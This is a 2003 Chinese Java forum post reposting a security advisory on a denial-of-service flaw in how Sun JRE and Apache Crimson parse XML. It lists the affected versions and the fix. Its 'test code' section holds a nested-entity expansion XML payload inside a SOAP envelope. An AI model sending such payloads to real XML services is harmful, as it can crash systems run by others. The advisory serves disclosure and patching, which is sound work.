Java开发网 |
注册 |
登录 |
帮助 |
搜索 |
排行榜 |
发帖统计
|
您没有登录 |
» Java开发网 » WebService/XML/JSON/SOAP/SOA
打印话题 寄给朋友 订阅主题 |
作者 | Sun Java XML文件嵌套对象拒绝服务攻击漏洞 |
nothing
天外飞仙..... CJSDN高级会员 发贴: 1636 积分: 131 |
于 2003-11-05 00:12
发布时间:2003-09-22 更新时间:2003-09-22 严重程度:高 威胁程度:远程拒绝服务 错误类型:设计错误 利用方式:服务器模式 BUGTRAQ ID:8666 受影响系统 Apache Software Foundation Crimson 1.0 Sun JRE (Linux Production Release) 1.2.2 _12 Sun JRE (Linux Production Release) 1.2.2 _015 Sun JRE (Linux Production Release) 1.2.2 _014 Sun JRE (Linux Production Release) 1.2.2 _013 Sun JRE (Linux Production Release) 1.2.2 _011 Sun JRE (Linux Production Release) 1.2.2 _010 Sun JRE (Linux Production Release) 1.2.2 _007 Sun JRE (Linux Production Release) 1.2.2 _006 Sun JRE (Linux Production Release) 1.2.2 _005 -Debian Linux 2.2 -MandrakeSoft Linux Mandrake 7.2 -RedHat Linux 7.0 -S.u.S.E. Linux 7.0 Sun JRE (Linux Production Release) 1.2.2 _004 Sun JRE (Linux Production Release) 1.2.2 _003 Sun JRE (Linux Production Release) 1.2.2 Sun JRE (Linux Production Release) 1.3 .0_05 Sun JRE (Linux Production Release) 1.3 .0_04 Sun JRE (Linux Production Release) 1.3 .0_03 Sun JRE (Linux Production Release) 1.3 .0_02 Sun JRE (Linux Production Release) 1.3 .0_01 Sun JRE (Linux Production Release) 1.3 .0 Sun JRE (Linux Production Release) 1.3.1 _07 Sun JRE (Linux Production Release) 1.3.1 _06 Sun JRE (Linux Production Release) 1.3.1 _05 Sun JRE (Linux Production Release) 1.3.1 _03 +Macromedia ColdFusion Server MX Developer +Macromedia ColdFusion Server MX Enterprise +Macromedia ColdFusion Server MX Professional Sun JRE (Linux Production Release) 1.3.1 _02 Sun JRE (Linux Production Release) 1.3.1 _01 Sun JRE (Linux Production Release) 1.3.1 Sun JRE (Linux Production Release) 1.4 .0_04 Sun JRE (Linux Production Release) 1.4 .0_03 Sun JRE (Linux Production Release) 1.4 .0_02 Sun JRE (Linux Production Release) 1.4 Sun JRE (Linux Production Release) 1.4.1 _03 Sun JRE (Linux Production Release) 1.4.1 _02 Sun JRE (Linux Production Release) 1.4.1 _01 +Opera Software Opera Web Browser 7.11 Sun JRE (Linux Production Release) 1.4.1 Sun JRE (Solaris Production Release) 1.1.6 +Sun Solaris 2.6 +Sun Solaris 2.6 _x86 +Sun Solaris 7.0 +Sun Solaris 7.0 _x86 +Sun Solaris 8.0 +Sun Solaris 8.0 _x86 Sun JRE (Solaris Production Release) 1.1.7 B +Sun Solaris 2.6 +Sun Solaris 2.6 _x86 +Sun Solaris 7.0 +Sun Solaris 7.0 _x86 +Sun Solaris 8.0 +Sun Solaris 8.0 _x86 Sun JRE (Solaris Production Release) 1.1.8 _14 Sun JRE (Solaris Production Release) 1.1.8 _13 Sun JRE (Solaris Production Release) 1.1.8 _009 Sun JRE (Solaris Production Release) 1.1.8 Sun JRE (Solaris Production Release) 1.2 Sun JRE (Solaris Production Release) 1.2.1 +Sun Solaris 2.6 +Sun Solaris 2.6 _x86 +Sun Solaris 7.0 +Sun Solaris 7.0 _x86 +Sun Solaris 8.0 +Sun Solaris 8.0 _x86 Sun JRE (Solaris Production Release) 1.2.2 _11 Sun JRE (Solaris Production Release) 1.2.2 _11 Sun JRE (Solaris Production Release) 1.2.2 _014 Sun JRE (Solaris Production Release) 1.2.2 _013 Sun JRE (Solaris Production Release) 1.2.2 _012 Sun JRE (Solaris Production Release) 1.2.2 _011 Sun JRE (Solaris Production Release) 1.2.2 _010 Sun JRE (Solaris Production Release) 1.2.2 Sun JRE (Solaris Production Release) 1.3 .0_05 Sun JRE (Solaris Production Release) 1.3 .0_02 Sun JRE (Solaris Production Release) 1.3 Sun JRE (Solaris Production Release) 1.3.1 _07 Sun JRE (Solaris Production Release) 1.3.1 _06 Sun JRE (Solaris Production Release) 1.3.1 _05 Sun JRE (Solaris Production Release) 1.3.1 _04 Sun JRE (Solaris Production Release) 1.3.1 _03 +Macromedia ColdFusion Server MX Developer +Macromedia ColdFusion Server MX Enterprise +Macromedia ColdFusion Server MX Professional Sun JRE (Solaris Production Release) 1.3.1 _02 Sun JRE (Solaris Production Release) 1.3.1 _01 Sun JRE (Solaris Production Release) 1.4 .0_04 Sun JRE (Solaris Production Release) 1.4 .0_04 Sun JRE (Solaris Production Release) 1.4 .0_03 Sun JRE (Solaris Production Release) 1.4 .0_02 Sun JRE (Solaris Production Release) 1.4 .0_01 Sun JRE (Solaris Production Release) 1.4 Sun JRE (Solaris Production Release) 1.4.1 _03 Sun JRE (Solaris Production Release) 1.4.1 _02 Sun JRE (Solaris Production Release) 1.4.1 _01 +Opera Software Opera Web Browser 7.11 Sun JRE (Solaris Production Release) 1.4.1 Sun JRE (Windows Production Release) 1.1.8 _009 Sun JRE (Windows Production Release) 1.1.8 _008 Sun JRE (Windows Production Release) 1.1.8 _007 Sun JRE (Windows Production Release) 1.1.8 Sun JRE (Windows Production Release) 1.2 Sun JRE (Windows Production Release) 1.2.1 Sun JRE (Windows Production Release) 1.2.2 _12 Sun JRE (Windows Production Release) 1.2.2 _015 Sun JRE (Windows Production Release) 1.2.2 _014 Sun JRE (Windows Production Release) 1.2.2 _013 Sun JRE (Windows Production Release) 1.2.2 _011 Sun JRE (Windows Production Release) 1.2.2 _010 Sun JRE (Windows Production Release) 1.2.2 Sun JRE (Windows Production Release) 1.3 .0_05 Sun JRE (Windows Production Release) 1.3 .0_04 Sun JRE (Windows Production Release) 1.3 .0_02 Sun JRE (Windows Production Release) 1.3 Sun JRE (Windows Production Release) 1.3.1 _07 Sun JRE (Windows Production Release) 1.3.1 _06 Sun JRE (Windows Production Release) 1.3.1 _05 Sun JRE (Windows Production Release) 1.3.1 _04 Sun JRE (Windows Production Release) 1.3.1 _03 +Macromedia ColdFusion Server MX Developer +Macromedia ColdFusion Server MX Enterprise +Macromedia ColdFusion Server MX Professional Sun JRE (Windows Production Release) 1.3.1 _02 Sun JRE (Windows Production Release) 1.3.1 _01a Sun JRE (Windows Production Release) 1.3.1 _01 Sun JRE (Windows Production Release) 1.4 .0_04 Sun JRE (Windows Production Release) 1.4 .0_03 Sun JRE (Windows Production Release) 1.4 .0_02 Sun JRE (Windows Production Release) 1.4 .0_01 Sun JRE (Windows Production Release) 1.4 Sun JRE (Windows Production Release) 1.4.1 _03 Sun JRE (Windows Production Release) 1.4.1 _02 Sun JRE (Windows Production Release) 1.4.1 _01 +Opera Software Opera Web Browser 7.11 +Opera Software Opera Web Browser 7.11 j Sun JRE (Windows Production Release) 1.4.1 未影响系统 Apache Software Foundation Crimson 1.1 Sun JRE (Linux Production Release) 1.4.2 Sun JRE (Solaris Production Release) 1.4.2 Sun JRE (Windows Production Release) 1.4.2 详细描述 Sun Java在处理含有特定结构的XML文件时存在漏洞,攻击者可以使用畸形的XML文件让Sun Java解析而导致其崩溃。 测试代码 <?xml version="1.0" encoding ="UTF-8"?> <!DOCTYPE foobar[ <!ENTITY x100 "foobar"> <!ENTITY x99 "&x100;&x100;"> <!ENTITY x98 "&x99;&x99;"> ... <!ENTITY x2 "&x3;&x3;"> <!ENTITY x1 "&x2;&x2;"> ]><SOAP-ENV:Envelope xmlns:SOAP-ENV=...><SOAP-ENV:Body><ns1:aaa xmlns:ns1="urn:aaa" SOAP-ENV:encodingStyle="..."><foobar xsi:type="xsd:string">&x1;</foobar></ns1:aaa></SOAP-ENV:Body></SOAP-ENV:Envelope> 解决方案 厂商已经在新版的j2se中解决了此问题: http://java.sun.com/j2se/ 相关信息 Release Notes Version 1.4.2 http://java.sun.com/j2se/1.4.2/relnotes.html#JAXP_security 躲得过的怪物,躲不过的刺激 |
话题树型展开 |
人气 | 标题 | 作者 | 字数 | 发贴时间 |
6100 | Sun Java XML文件嵌套对象拒绝服务攻击漏洞 | nothing | 8723 | 2003-11-05 00:12 |
已读帖子 新的帖子 被删除的帖子 |
Powered by Jute Powerful Forum® Version Jute 1.5.6 Ent Copyright © 2002-2021 Cjsdn Team. All Righits Reserved. 闽ICP备05005120号-1 客服电话 18559299278 客服信箱 714923@qq.com 客服QQ 714923 |